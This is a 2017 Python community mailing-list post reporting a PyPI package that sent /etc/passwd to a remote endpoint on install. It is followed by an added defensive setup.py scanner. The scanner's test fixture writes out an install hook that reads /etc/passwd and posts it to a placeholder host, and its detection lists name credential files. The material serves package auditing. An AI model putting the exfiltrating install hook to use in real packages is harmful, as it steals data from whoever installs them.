[PSF-Community] Dangerous PyPI packages and PSF

Bruno Rocha rochacbruno at gmail.com
Thu May 4 20:08:15 EDT 2017


Interesting detail: the mentioned package
https://pypi.python.org/pypi/python-nation/1.0.1 was created and uploaded
by Jacob Kaplan-Moss, so I guess this is intended to be a POC to show PyPI
vulnerabilities, or some infosec experiment.

On Thu, May 4, 2017 at 8:41 PM, Bruno Rocha <rochacbruno at gmail.com> wrote:

> Hi,
>
> I just read this on reddit[0], a thread asking if PyPI packages are
> audited, and somebody pointed to `python-nation`[1], which is a harmful and
> useless module: it installs itself and sends the `/etc/passwd` content to
> an external endpoint.
>
> The app receiving the data is hosted at http://python-nation.herokuapp.com
>
> and as the PSF mission [2] says
>
> The mission of the Python Software Foundation is to promote, protect, and
> advance the Python programming language
>
> I wonder if there is some workgroup at PSF to handle this? And not only
> the specific case of `python-nation`, which should be deleted and the user
> banned maybe, but also the audit of other packages?
>
>
> [0] https://www.reddit.com/r/Python/comments/697da2/does_pypi_review_code_thats_uploaded/
> [1] https://www.reddit.com/r/Python/comments/697da2/does_pypi_review_code_thats_uploaded/dh4uyf8/
> [2] https://www.python.org/psf/mission/
>
>
> Cheers,
>
> --
>
> *Bruno Rocha - @rochacbruno <http://twitter.com/rochacbruno>*
> http://brunorocha.org
>
>


-- 

*Bruno Rocha - @rochacbruno <http://twitter.com/rochacbruno>*
http://brunorocha.org
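The quoted message describes a package whose installer reads `/etc/passwd` and posts it to a remote host, and asks how such packages could be audited. One concrete, defender-side check an auditor can run before ever executing a package's `setup.py` is a static scan of that file for the ingredients of such behaviour: a custom command class hooking the `install` step, a `cmdclass=` override passed to `setup()`, imports of network modules, hard-coded URLs, and string literals naming sensitive files. The following is an added example written for this page, not code from the thread or from PyPI; the two `setup.py` fixtures are constructed for illustration (the endpoint is a placeholder, not the real one), and the path and module lists are assumptions an auditor would tune.

```python
import ast

# Constructed fixture (NOT the real python-nation package): a setup.py whose
# install hook reads /etc/passwd and ships it to a placeholder endpoint.
SUSPICIOUS_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        data = open("/etc/passwd").read()
        urllib.request.urlopen("http://EXAMPLE-ENDPOINT.invalid/collect", data.encode())

setup(name="example-pkg", version="1.0", cmdclass={"install": PostInstall})
'''

# Constructed fixture of an ordinary setup.py with no install-time hooks.
BENIGN_SETUP_PY = '''
from setuptools import setup
setup(name="example-pkg", version="1.0", packages=["example_pkg"])
'''

# Assumed heuristics; an auditor would extend these lists for their environment.
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", "/.ssh/", ".aws/credentials")
NETWORK_MODULES = ("urllib", "urllib2", "requests", "socket", "http", "httplib")
INSTALL_HOOK_BASES = ("install", "develop", "egg_info", "build_py")


def audit_setup_py(source):
    """Return a list of 'kind: detail at line N' findings for a setup.py text.

    The file is only parsed, never imported or executed, so the audit itself
    cannot trigger whatever the installer would do."""
    findings = []
    tree = ast.parse(source)
    for node in ast.walk(tree):
        # A class deriving from a setuptools command hooks a build/install step.
        if isinstance(node, ast.ClassDef):
            for base in node.bases:
                name = base.id if isinstance(base, ast.Name) else getattr(base, "attr", "")
                if name in INSTALL_HOOK_BASES:
                    findings.append(f"install-time hook: class {node.name}({name}) at line {node.lineno}")
        # Network modules have no business in a plain packaging script.
        elif isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in NETWORK_MODULES:
                    findings.append(f"network import: {alias.name} at line {node.lineno}")
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "").split(".")[0] in NETWORK_MODULES:
                findings.append(f"network import: {node.module} at line {node.lineno}")
        # String literals: sensitive file names and hard-coded remote URLs.
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(p in node.value for p in SENSITIVE_PATHS):
                findings.append(f"sensitive path literal: {node.value!r} at line {node.lineno}")
            if node.value.startswith(("http://", "https://")):
                findings.append(f"remote URL literal: {node.value!r} at line {node.lineno}")
        # cmdclass= replaces a standard step with the package's own code.
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Name) and node.func.id == "setup":
            for kw in node.keywords:
                if kw.arg == "cmdclass":
                    findings.append(f"setup(cmdclass=...) overrides a build step at line {node.lineno}")
    return findings


if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SETUP_PY), ("benign", BENIGN_SETUP_PY)):
        print(f"== {label} ==")
        for f in audit_setup_py(src) or ["no findings"]:
            print("  ", f)
```

Run against the suspicious fixture this reports five findings (the hook class, the `cmdclass=` override, the `urllib.request` import, the `/etc/passwd` literal and the URL literal) and nothing for the benign one. It is a heuristic, not a verdict: a `cmdclass` override has legitimate uses, and a determined author can hide strings from a literal scan, so a scan like this is a triage filter that tells a reviewer which packages deserve a manual read before anything is installed.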